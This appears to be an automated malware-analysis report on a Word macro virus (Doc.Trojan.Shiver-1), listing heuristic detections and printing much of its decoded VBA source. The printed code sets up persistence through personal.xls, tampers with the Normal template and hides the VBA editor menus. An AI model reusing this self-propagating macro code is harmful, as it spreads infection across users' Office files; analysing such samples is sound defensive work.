MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file contains VBA macros, including Auto_Open and Auto_Close functions, which are commonly used to initiate malicious activity upon opening or closing a document. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute external commands. The script evidence shows an attempt to insert a file from 'c:\shiver.sys', suggesting it acts as a downloader or dropper for a second-stage payload. The ClamAV detection 'Doc.Trojan.Shiver-1' further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Trojan.Shiver-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Shiver-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27847 bytes |
SHA-256: 7f0b7aa4e2ba0ef2ed3b4f1718d660daa6f596def623dc0e25767ef4adb92032 |
|||
|
Detection
ClamAV:
Doc.Trojan.Shiver-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal strClassName As String, ByVal lpWindowName As Any) As Long
Attribute FindWindow.VB_ProcData.VB_Invoke_Func = " \n14"
Public ExcelFound, WordFound, Marker, JustRun As Boolean
Sub WordStealth()
Attribute WordStealth.VB_ProcData.VB_Invoke_Func = " \n14"
Yin = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Yin < 4 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString "Sub ToolsMacro()" & vbCr & "End Sub" & vbCr & "Sub FileTemplates()" & vbCr & "End Sub" & vbCr & "Sub ViewVBCode()" & vbCr & "End Sub"
End If
End Sub
Sub AutoExit()
Attribute AutoExit.VB_ProcData.VB_Invoke_Func = " \n14"
Randomize
On Error GoTo out
Call CheckMarker
hWnd = FindApp("XLMain")
If hWnd <> 0 Then ExcelFound = True
If ExcelFound = False And Marker = False Then
Application.WindowState = wdWindowStateMinimize
Call PersonalFun
Shell (Application.Path + "\Excel.exe"), vbMinimizedFocus
Do While ExcelFound = False
Call FindExcel
Loop
Application.DDETerminateAll
CNL = Application.DDEInitiate("Excel", "system")
Application.DDEExecute CNL, "[New(4)]"
Application.DDETerminate CNL
CNL = Application.DDEInitiate("Excel", "Macro1")
Application.DDEPoke CNL, Item:="R1C1", Data:="=VBA.INSERT.FILE(""c:\shiver.sys"")"
Application.DDEPoke CNL, Item:="R2C1", Data:="=SAVE.AS(""" & Application.Path & "\xlstart\personal.xls"")"
Application.DDEPoke CNL, Item:="R3C1", Data:="=Return()"
DDEExecute channel:=CNL, Command:="[Run(""R1C1"")]"
Application.DDETerminate CNL
CNL = Application.DDEInitiate("Excel", "system")
Application.DDEExecute CNL, "[RUN(""Personal.xls!PXL_Done"")]"
Application.DDETerminate CNL
Call MakeMarker
JustRun = True
End If
out:
If (Int(Rnd * 30) = 5) Then Call wdReEvalInfection
End Sub
Sub FindExcel()
Attribute FindExcel.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
For x = 1 To 50
w = Tasks.Item(x)
If Mid(w, 1, 15) = "Microsoft Excel" Then
ExcelFound = True
Exit Sub
End If
Next x
End Sub
Function FindApp(ByVal varClassName As Variant) As Long
Attribute FindApp.VB_ProcData.VB_Invoke_Func = " \n14"
If IsNull(varClassName) Then
FindApp = 0
Else
FindApp = FindWindow(CStr(varClassName), 0&)
End If
End Function
Sub PersonalFun()
Attribute PersonalFun.VB_ProcData.VB_Invoke_Func = " \n14"
PSLIVE = Application.Path + "\xlstart\personal.xls"
PS = Dir(PSLIVE)
If "PERSONAL.XLS" = UCase(PS) Then
Kill PSLIVE
End If
End Sub
Sub CheckMarker()
Attribute CheckMarker.VB_ProcData.VB_Invoke_Func = " \n14"
If Application.Application = "Microsoft Word" Then
mkr = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "Shiver[DDE]")
Else
mkr = GetSetting("Office", "8.0", "Shiver[DDE]")
End If
If mkr = "ALT-F11" Then Marker = True
End Sub
Sub MakeMarker()
Attribute MakeMarker.VB_ProcData.VB_Invoke_Func = " \n14"
If Application.Application = "Microsoft Word" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "Shiver[DDE]") = "ALT-F11"
Else
SaveSetting "Office", "8.0", "Shiver[DDE]", "ALT-F11"
End If
End Sub
Sub PXL_Done()
Attribute PXL_Done.VB_ProcData.VB_Invoke_Func = " \n14"
ActiveWindow.Visible = False
Workbooks("personal.xls").Save
Application.Quit
End Sub
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "ShiverTime"
End Sub
Sub ShiverTime()
Attribute ShiverTime.VB_ProcData.VB_Invoke_Func = " \n14"
Rando
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.